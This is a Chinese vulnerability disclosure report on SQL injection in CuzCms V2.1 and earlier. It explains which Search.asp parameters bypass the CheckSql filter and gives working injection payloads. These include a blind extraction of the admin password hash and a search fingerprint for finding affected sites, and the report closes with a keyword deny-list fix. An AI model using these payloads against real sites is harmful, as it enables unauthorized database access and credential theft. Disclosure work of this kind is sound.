2015-01-12: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-04-13: 厂商已经主动忽略漏洞,细节向公众公开
CuzCms_V2.1及以下版本SQL注入
CuzCms成创网站内容管理系统由沈阳成创网络科技有限公司基于微软ASP、通用ACCESS/MSSQL数据库开发完成;CuzCms在SQL注入基本都被过滤了因为在Include\Conn.asp中包含了CheckSql函数Conn.asp的47-101行:
'================================================'函名:CheckSql'作用:防止SQl注入'================================================Function CheckSql(Str) If Str = "" Then CheckSql = "" Exit Function End If Str = Replace(Str,Chr(0),"", 1, -1, 1) Str = Replace(Str, """", """, 1, -1, 1) Str = Replace(Str,"<","<", 1, -1, 1) Str = Replace(Str,">",">", 1, -1, 1) Str = Replace(Str, "script", "script", 1, -1, 0) Str = Replace(Str, "SCRIPT", "SCRIPT", 1, -1, 0) Str = Replace(Str, "Script", "Script", 1, -1, 0) Str = Replace(Str, "script", "Script", 1, -1, 1) Str = Replace(Str, "object", "object", 1, -1, 0) Str = Replace(Str, "OBJECT", "OBJECT", 1, -1, 0) Str = Replace(Str, "Object", "Object", 1, -1, 0) Str = Replace(Str, "object", "Object", 1, -1, 1) Str = Replace(Str, "applet", "applet", 1, -1, 0) Str = Replace(Str, "APPLET", "APPLET", 1, -1, 0) Str = Replace(Str, "Applet", "Applet", 1, -1, 0) Str = Replace(Str, "applet", "Applet", 1, -1, 1) Str = Replace(Str, "[", "[") Str = Replace(Str, "]", "]") Str = Replace(Str, """", "", 1, -1, 1) Str = Replace(Str, "=", "=", 1, -1, 1) Str = Replace(Str, "’", "’’", 1, -1, 1) Str = Replace(Str, "select", "select", 1, -1, 1) Str = Replace(Str, "execute", "execute", 1, -1, 1) Str = Replace(Str, "exec", "exec", 1, -1, 1) Str = Replace(Str, "join", "join", 1, -1, 1) Str = Replace(Str, "union", "union", 1, -1, 1) Str = Replace(Str, "where", "where", 1, -1, 1) Str = Replace(Str, "insert", "insert", 1, -1, 1) Str = Replace(Str, "delete", "delete", 1, -1, 1) Str = Replace(Str, "update", "update", 1, -1, 1) Str = Replace(Str, "like", "like", 1, -1, 1) Str = Replace(Str, "drop", "drop", 1, -1, 1) Str = Replace(Str, "create", "create", 1, -1, 1) Str = Replace(Str, "rename", "rename", 1, -1, 1) Str = Replace(Str, "count", "count", 1, -1, 1) Str = Replace(Str, "chr", "chr", 1, -1, 1) Str = Replace(Str, "mid", "mid", 1, -1, 1) Str = Replace(Str, "truncate", "truncate", 1, -1, 1) Str = Replace(Str, "nchar", "nchar", 1, -1, 1) Str = Replace(Str, "char", "char", 1, -1, 1) Str = Replace(Str, "alter", "alter", 1, -1, 1) Str = Replace(Str, "cast", "cast", 1, -1, 1) Str = Replace(Str, "exists", "exists", 1, -1, 1) Str = Replace(Str,Chr(13),"<br>", 1, -1, 1) CheckSql = Replace(Str,"’","’’", 1, -1, 1) End Function
通常获取的参数都加了防SQL注入校验,如:SortID = CheckSql(Int(Request.Querystring("SortID")))把代码都翻了一遍,发现在Search.asp中在获取参数KeyWord和Cuz时,未加入SQL校验。
KeyWord = Trim(Request("KeyWord"))Cuz = Trim(Request("Cuz"))
然后代入查询:
datafrom="Cuz_"&Cuz datawhere="where "&ItemRecT&" " if SortID>0 then datawhere=datawhere&"and SortID="&SortID&" " if KeyWord<>"" then datawhere=datawhere&"and Item1 like '%"&KeyWord&"%' " taxis="order by ItemID desc " sql="select count(ItemID) as idCount from ["& datafrom &"]" & datawhere
但注入的利用需要构造,这里我把SQL执行的代码输出到页面,加入:第一句SQL:
sql="select count(ItemID) as idCount from ["& datafrom &"]" & datawhere Response.Write "<font color=red>SQL1=>"&sql&"</font><br>"
第二句SQL:
sql="select ItemID from ["& datafrom &"] " & datawhere & taxis Response.Write "<font color=red>SQL2=>"&sql&"</font><br>"
第三句SQL:
sql="select * from ["& datafrom &"] where ItemID in("& sqlid &") "&taxis Response.Write "<font color=red>SQL3=>"&sql&"</font><br>"
输入一直关键字w正常查询为:
输出的执行语句为:
SQL1=>select count(ItemID) as idCount from [Cuz_News]where ItemRec = True and Item1 like '%w%'
SQL2=>select ItemID from [Cuz_News] where ItemRec = True and Item1 like '%w%' order by ItemID desc
SQL3=>select * from [Cuz_News] where ItemID in(69) order by ItemID desc
经过分析,利用关键字KeyWord处构造,POST提交以下代码(判断用户表行数>0):
Cuz=News&KeyWord=术'%20and%20IIF((select%20count(*)%20from%20Cuz_User)>0,1,0)%20and%20'a'<>'a
执行效果图如下:
说明:如果构造不正确或者没有结果,那么只会显示SQL1的语句,即执行不成功。。。如图
显示0条数据
http://www.cuzcms.com/搜索特征:powered by CuzCms
获取管理员密码验证:
执行语句:
SQL1=>select count(ItemID) as idCount from [Cuz_News]where ItemRec = True and Item1 like '%/' and IIF((select top 1 asc(mid(Item2,2,1)) from Cuz_User where Item1='admin')=97,1,0) and 'a'<>'a%'SQL2=>select ItemID from [Cuz_News] where ItemRec = True and Item1 like '%/' and IIF((select top 1 asc(mid(Item2,2,1)) from Cuz_User where Item1='admin')=97,1,0) and 'a'<>'a%' order by ItemID descSQL3=>select * from [Cuz_News] where ItemID in(71) order by ItemID desc
内容为:7a57a5a743894a0e真实数据为:
验证完毕。。。
在NoSql.asp代码中增加:
N_In = "'|;|and|(|)|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare"
确保任何形式(Get、Post、Cookie)的参数被SQL过滤
未能联系到厂商或者厂商积极拒绝
狗不理大神!
大写绕过?
@tnt1200 @HackBraid 都不是。。。利用位置比较诡异